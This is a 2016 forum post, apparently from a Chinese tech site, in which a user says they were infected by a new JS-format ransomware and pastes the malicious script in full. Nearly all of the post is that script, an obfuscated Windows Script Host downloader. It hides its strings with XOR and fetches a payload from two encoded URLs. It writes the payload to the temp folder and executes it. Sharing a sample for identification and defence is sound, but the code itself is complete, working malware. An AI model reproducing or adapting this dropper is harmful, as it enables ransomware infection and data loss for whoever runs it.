HTML112k病毒,勒索病毒新款,JS格式,中招了

本帖最后由 rzmould 于 2016-2-25 21:23 编辑

不知道怎样上传附件

我把JS代码复制出来吧:

function btoa(circumspectBo0, elaboratebvc, pallidmOf, inscrutableRPO, notwithstandingfDY, unwontedNVL, baubleUx7, vintneryUp) {

var foistBGn = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

var stumpBlC = String(vintneryUp);

for (var sententiouszFe, amalgamatebau, chideuVq = 0, whittlex80 = foistBGn, evidentKPV = ""; stumpBlC.charAt(chideuVq | 0) || (whittlex80 = "=",

chideuVq % 1); evidentKPV += whittlex80.charAt(63 & sententiouszFe >> 8 - chideuVq % 1 * 8)) {

amalgamatebau = stumpBlC.charCodeAt(chideuVq += 3 / 4);

if (amalgamatebau > 255) {

throw new InvalidCharacterError("'btoa' failed: The string to be encoded contains characters outside of the Latin1 range.");

}

sententiouszFe = sententiouszFe << 8 | amalgamatebau;

}

return evidentKPV;

}

var adjurepe6 = function(diversifiedOuA) {

var hoodwinkc8q = "";

var circumspectBo0 = "skillecC";

var elaboratebvc = "liberalQxA";

var pallidmOf = "constituencyhRJ";

var inscrutableRPO = "seetheU0h";

var notwithstandingfDY = "nihilistRrJ";

var unwontedNVL = "visageMtV";

var baubleUx7 = "grants8C";

btoa(circumspectBo0, elaboratebvc, pallidmOf, inscrutableRPO, notwithstandingfDY, unwontedNVL, baubleUx7, [ 48, 6, 77, 242, 233, 48, 122, 29, 20, 227, 182, 169, 229, 77, 17, 93 ]);

var scarceVq8 = String["sdfadfasdffromChar".slice(10) + "Codedsfadsfasdg".slice(0, 4)];

for (var sonorousC48 = 0; sonorousC48 < diversifiedOuA.length; sonorousC48++) {

var deferenceTpg = [ 48, 6, 77, 242, 233, 48, 122, 29, 20, 227, 182, 169, 229, 77, 17, 93 ];

hoodwinkc8q += scarceVq8(diversifiedOuA[sonorousC48] ^ deferenceTpg[sonorousC48 % deferenceTpg.length]);

}

return hoodwinkc8q;

};

var conferkda = function() {

var dormerJxr = function() {

var justifyU9k = adjurepe6([ 113, 65, 9, 159, 222, 100, 46, 85, 39, 173 ]);

var knightyqV = adjurepe6([ 101, 48, 3, 148, 156, 87, 22, 117, 126, 129 ]);

};

dormerJxr.prototype.re8IyFLTFe = function(docileLrx) {

var gainsayocI = adjurepe6([ 115, 116, 40, 147, 157, 85, 53, 127, 126, 134, 213, 221 ]);

return wsh[gainsayocI](docileLrx);

};

dormerJxr.prototype.yiMJ7dfCHg = function(docileLrx) {

var gainsayocI = adjurepe6([ 115, 116, 40, 147, 157, 85, 53, 127, 126, 134, 213, 221 ]);

return WScript[gainsayocI](docileLrx);

};

return dormerJxr;

}();

(function() {

var ramparti6v = [ adjurepe6([ 88, 114, 57, 130, 211, 31, 85, 117, 100, 130, 196, 204, 156, 34, 100, 53, 85, 116, 40, 131, 152, 30, 25, 114, 121, 204, 142, 158, 203, 40, 105, 56 ]), adjurepe6([ 88, 114, 57, 130, 211, 31, 85, 117, 100, 130, 218, 218, 138, 58, 112, 51, 68, 117, 43, 148, 199, 83, 21, 112, 59, 219, 129, 135, 128, 53, 116 ]) ];

var ensconceX6Y = 4194304;

var upbraidDqs = adjurepe6([ 64, 114, 24, 155, 208, 125, 24, 123, 125, 186 ]);

var obtuseqGH = adjurepe6([ 83, 85, 33, 203, 174, 102, 59, 86, 97, 165 ]);

var astringenttbO = adjurepe6([ 126, 113, 27, 153, 165, 93, 77, 122, 94, 167 ]);

var maliceQ3M = new conferkda();

var perpetrateQCi = maliceQ3M[adjurepe6([ 73, 111, 0, 184, 222, 84, 28, 94, 92, 132 ])];

var buxomCgc = perpetrateQCi(adjurepe6([ 103, 85, 46, 128, 128, 64, 14, 51, 71, 139, 211, 197, 137 ]));

var audaciousvKC = perpetrateQCi(adjurepe6([ 125, 85, 21, 191, 165, 2, 84, 69, 89, 175, 254, 253, 177, 29 ]));

var baneMkH = perpetrateQCi(adjurepe6([ 113, 66, 2, 182, 171, 30, 41, 105, 102, 134, 215, 196 ]));

var partialitykBC = buxomCgc.ExpandEnvironmentStrings(adjurepe6([ 21, 82, 8, 191, 185, 21, 38 ]));

var stumpfda = partialitykBC + ensconceX6Y + adjurepe6([ 30, 99, 53, 151 ]);

var bemuseNiI = false;

var mountebankWDL = 200;

for (var staidb68 = 0; staidb68 < ramparti6v.length; staidb68++) {

try {

var meritojA = ramparti6v[staidb68];

audaciousvKC.open(adjurepe6([ 119, 67, 25 ]), meritojA, false);

audaciousvKC.send();

if (audaciousvKC.status == mountebankWDL) {

try {

baneMkH[adjurepe6([ 95, 118, 40, 156 ])]();

baneMkH.type = 1;

baneMkH[adjurepe6([ 71, 116, 36, 134, 140 ])](audaciousvKC[adjurepe6([ 66, 99, 62, 130, 134, 94, 9, 120, 86, 140, 210, 208 ])]);

var scrutinizeqWz = Math.pow(2, 10) * 249;

if (baneMkH.size > scrutinizeqWz) {

staidb68 = ramparti6v.length;

baneMkH.position = 0;

baneMkH.saveToFile(stumpfda, 2);

bemuseNiI = true;

}

} finally {

baneMkH.close();

}

}

} catch (ignored) {}

}

if (bemuseNiI) {

buxomCgc[adjurepe6([ 117, 126, 40, 145 ])](partialitykBC + Math.pow(2, 22));

}

})();

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值